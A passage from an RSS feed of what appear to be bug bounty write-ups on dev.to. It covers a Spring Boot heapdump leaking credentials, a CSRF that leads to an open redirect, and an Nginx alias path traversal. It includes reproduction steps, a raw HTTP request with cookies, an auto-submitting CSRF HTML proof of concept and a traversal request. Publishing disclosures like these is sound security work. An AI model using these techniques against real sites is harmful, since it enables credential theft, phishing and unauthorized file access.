&lt;a href="https://c4ng4c31r0%5B.%5Dcom/api/maintenance/actuator/scheduledtasks"&gt;https://c4ng4c31r0[.]com/api/maintenance/actuator/scheduledtasks&lt;/a&gt;&lt;br&gt;
&lt;a href="https://c4ng4c31r0%5B.%5Dcom/api/maintenance/actuator/threaddump"&gt;https://c4ng4c31r0[.]com/api/maintenance/actuator/threaddump&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Steps to reproduce:&lt;br&gt;
1 - Use the wordlist [&lt;a href="https://github.com/emadshanab/DIR-WORDLISTS/blob/main/spring-boot.txt"&gt;https://github.com/emadshanab/DIR-WORDLISTS/blob/main/spring-boot.txt&lt;/a&gt;] to perform a brute force attack on the &lt;a href="https://c4ng4c31r0%5B.%5Dcom/api/maintenance/"&gt;https://c4ng4c31r0[.]com/api/maintenance/&lt;/a&gt; endpoint.&lt;br&gt;
2 - Note that the heapdump endpoint was identified. When accessing it, an automatic download is performed containing a binary file.&lt;br&gt;
Using visualvm &lt;a href="https://visualvm.github.io/"&gt;https://visualvm.github.io/&lt;/a&gt;, we can read the contents of the file in plain text.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;PoC&lt;/strong&gt;&lt;br&gt;
Using visualvm to decompile and read plain text credentials:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F984re613my1dqo6a8mce.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F984re613my1dqo6a8mce.png" alt="Image description" width="800" height="430"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1rz7ylu9ql3idcbxvqok.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1rz7ylu9ql3idcbxvqok.png" alt="Image description" width="800" height="392"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Status/Reward:&lt;br&gt;
Resolved!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvooqvmc5aq1b7ppqtsux.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvooqvmc5aq1b7ppqtsux.png" alt="Image description" width="800" height="332"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
    </item>
    <item>
      <title>CSRF leads to Open redirect</title>
      <dc:creator>João Victor</dc:creator>
      <pubDate>Wed, 05 Jun 2024 13:49:11 +0000</pubDate>
      <link>https://dev.to/c4ng4c31r0/csrf-leads-to-open-redirect-1n5a</link>
      <guid>https://dev.to/c4ng4c31r0/csrf-leads-to-open-redirect-1n5a</guid>
      <description>&lt;p&gt;&lt;strong&gt;Reward: 15$&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Overview of the Vulnerability&lt;/strong&gt;&lt;br&gt;
Open redirects occur when an application accepts user input that is not validated into the target of a redirection. This input causes a redirection to an external domain, manipulating a user by redirecting them to a malicious site. An open redirect was identified which can impact users' ability to trust legitimate web pages. An attacker can send a phishing email that contains a link with a legitimate business name in the URL and the user will be redirected from the legitimate web server to any external domain. Users are less likely to notice subsequent redirects to different domains when an authentic URL with a valid SSL certificate can be used within the phishing link.&lt;br&gt;
This type of attack is also a precursor for more serious vulnerabilities such as Cross-Site Scripting (XSS), Server-Side Request Forgery (SSRF), Cross-Site Request Forgery (CSRF), or successful phishing attempts where an attacker can harvest users' credentials or gain users' OAuth access by relaying them through an Open Redirection, to a server they control (and can see the inbound requests from).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Business Impact&lt;/strong&gt;&lt;br&gt;
Open redirects can result in reputational damage for the business as customers' trust is negatively impacted by an attacker sending them to a phishing site to extract login credentials, or coercing them to send a financial transaction.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Steps to Reproduce&lt;/strong&gt;&lt;br&gt;
Copy and paste the request below into the burp suite using the "Generate CSRF Poc" functionality, create an HTML page and access it via browser (with the same burp proxy)&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Request&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;POST /account/change_language HTTP/2
Host: site.com
Cookie: anon-device-id=4c27c635-6a6f-488f-b9a2-9f29173ff515; __cf_bm=Rac7hxpK8o94OYuHBu0gHix5xW0o11y2VhCwxxB_FR4-1707166647-1-AY6CLDec/7yODhPtCT3RC8iWE1Y6m7OqSf1VTqUO7pToGWcrBI9nnOYtOtQ1q4IiaLJ/vu3GKRnCEJyPWMrGaEw=; _mfp_session=kBbELYGofqGXJmZg0zIGaRo5jp7GSfjdTL6s34tbquYJoS4J1VYF1cPZkd6x2Z4xx8R7OKNpX6OJOndQS%2BN4G%2By0pbfitT5oXfov74Cp89zjaFAtX5s7ER0iMSrpbLnlK2jKRHxyusVX2AvU9v5fGc5ApZM4PL3NNdNsmqcxawJcMInSweGvPuOyFMPVYZnsSvkvWS0ARSviiGtwV%2BVM3LlRaG%2F4TgfDEiovbD%2BaszqwpTJntbX9%2Bb%2F3KjwFwitYeifofA8tvKjngXhky36cBVNBDhaToZwxIFnHZp07zLv%2FaHWEKJV4aV11Y3hT%2FGzfJrJjttWtMJicou7FDNX3eXmHhUkJ8zDX22eLGUVTu6w%3D--6me1Z0vPivn%2BoJTV--XkmHgGy679Gl%2FKNsddY7Cw%3D%3D; __Host-next-auth.csrf-token=a139928ae57b8911a5892a7866026aa63815d65196e4e5c6218aaceabb9d4c8d%7C4c4e2344fbf4063da52b2f3ec8315251ff45a9a1bf6e3dfa6018aa87d031a820; __Secure-next-auth.callback-url=https%3A%2F%2Fwww.myfitnesspal.com; AMP_MKTG_2746a27a28=JTdCJTdE; sp_gam_npa=false; dnsDisplayed=undefined; ccpaApplies=true; signedLspa=undefined; _sp_su=false; cf_clearance=xKv4h6PVvCdNz7Ru5gaJgKtAYmWXoaflj0xDqSOggT0-1707166524-1-AWvQd7Iq4gjsZKptQAw3Q+5trsYPEFKOazWRqcbbdG7Z5Wurf9+pCIlWRXfiNiuMG3qUKUj2euDmAeHb2mor0To=; AMP_2746a27a28=JTdCJTIyZGV2aWNlSWQlMjIlM0ElMjJlNWQwMzQ0My0yZTdmLTQ0YmItOTRlNy0zMjllNDI1NGNjZTAlMjIlMkMlMjJzZXNzaW9uSWQlMjIlM0ExNzA3MTY2NTIwNjEwJTJDJTIyb3B0T3V0JTIyJTNBZmFsc2UlMkMlMjJsYXN0RXZlbnRUaW1lJTIyJTNBMTcwNzE2NjU0NTAxMSUyQyUyMmxhc3RFdmVudElkJTIyJTNBNSU3RA==; ccpaConsentAll=true; ccpaReject=false; consentStatus=consentedAll; ccpaUUID=215fdb39-e2eb-4b5e-9042-6f2987093e4b; consentUUID=05f64a74-d7ed-4569-8d6d-303333bf8b4b; _dd_s=logs=0&amp;amp;expire=1707167476513&amp;amp;rum=2&amp;amp;id=fb0f58b6-9182-4e3e-92d0-04445647a54f&amp;amp;created=1707166516408; language_setting=en
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36

authenticity_token=%2BpU4FL6cJuhgBhPzLu2rrTP0n31B1KCplGXuHxvJf7spxrsiuxYbyy3sxYU5YyKZ3EJN%2BdztJQjvJuWkCsTOPQ==&amp;amp;originating_path=http://www.c4ng4c31r0.com%3F&amp;amp;preference[language_setting]=en
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;CSRF HTML&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;html&amp;gt;
  &amp;lt;!-- CSRF PoC - generated by Burp Suite Professional --&amp;gt;
  &amp;lt;body&amp;gt;
    &amp;lt;form action="https://site.com/account/change_language" method="POST"&amp;gt;
      &amp;lt;input type="hidden" name="authenticity&amp;amp;#95;token" value="&amp;amp;#43;pU4FL6cJuhgBhPzLu2rrTP0n31B1KCplGXuHxvJf7spxrsiuxYbyy3sxYU5YyKZ3EJN&amp;amp;#43;dztJQjvJuWkCsTOPQ&amp;amp;#61;&amp;amp;#61;" /&amp;gt;
      &amp;lt;input type="hidden" name="originating&amp;amp;#95;path" value="http&amp;amp;#58;&amp;amp;#47;&amp;amp;#47;www&amp;amp;#46;c4ng4c31r0&amp;amp;#46;com" /&amp;gt;
      &amp;lt;input type="hidden" name="preference&amp;amp;#91;language&amp;amp;#95;setting&amp;amp;#93;" value="en" /&amp;gt;
      &amp;lt;input type="submit" value="Submit request" /&amp;gt;
    &amp;lt;/form&amp;gt;
    &amp;lt;script&amp;gt;
      history.pushState('', '', '/');
      document.forms[0].submit();
    &amp;lt;/script&amp;gt;
  &amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;PoC:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm781sxj09g6eirt866go.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm781sxj09g6eirt866go.png" alt="Image description" width="800" height="358"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Generation CSRF PoC&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F59fnhknryag7lsxodyxj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F59fnhknryag7lsxodyxj.png" alt="Image description" width="755" height="718"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Acessing URL generated with PoC&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkgkix7x3ci2attu66fmc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkgkix7x3ci2attu66fmc.png" alt="Image description" width="361" height="91"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Redirecting&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc4uuu6tbvct021hxgmr2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc4uuu6tbvct021hxgmr2.png" alt="Image description" width="527" height="175"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Reward/Status:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4z9pax5k02ohkwb28r3y.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4z9pax5k02ohkwb28r3y.png" alt="Image description" width="418" height="214"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Nginx Alias Path Traversal</title>
      <dc:creator>João Victor</dc:creator>
      <pubDate>Tue, 04 Jun 2024 20:22:50 +0000</pubDate>
      <link>https://dev.to/c4ng4c31r0/nginx-alias-path-traversal-1498</link>
      <guid>https://dev.to/c4ng4c31r0/nginx-alias-path-traversal-1498</guid>
      <description>&lt;p&gt;&lt;strong&gt;Path Traversal&lt;/strong&gt;&lt;br&gt;
Overview of the Vulnerability&lt;br&gt;
Path traversal uses a server misconfiguration to access hidden files and directories that are stored on the served web application. This can include sensitive operating files, code and data that runs the application, or in some cases, user credentials.&lt;/p&gt;

&lt;p&gt;An attacker can leverage the path traversal vulnerability in this application to gain access to system files in a folder of a directory that is not intended for public access.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Business Impact&lt;/strong&gt;&lt;br&gt;
Path traversal can lead to reputational damage for the business due to a loss in confidence and trust by users. It can also result in data theft and indirect financial losses to the business through the costs of notification and rectifying and breached PII data if an attacker can successfully exfiltrate user data.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Steps to Reproduce&lt;/strong&gt;&lt;br&gt;
Use burp to replicate this request:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;GET /api../README.md HTTP/2
Host: site.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Connection: Keep-alive
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Note that it was possible to read the contents of the file.&lt;/p&gt;

&lt;p&gt;I performed other checks, but I was unable to read the name of other commonly identified files, but you can better validate by checking the name of other files that actually exist on the server and properly validate the vulnerability.&lt;br&gt;
Also note that the information contained in the readme file is partly from the external environment, where it mentions internal files, shows the execution of a cron job, displays the name of the internal server, among other information.&lt;/p&gt;

&lt;p&gt;PoC:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6qn70ruzbdsgvxk48hdc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6qn70ruzbdsgvxk48hdc.png" alt="Image description" width="716" height="744"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Reward/Status:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3n5eflj4ll4ktvdw4k0b.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3n5eflj4ll4ktvdw4k0b.png" alt="Image description" width="518" height="291"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
    </item>
  </channel>
</rss>
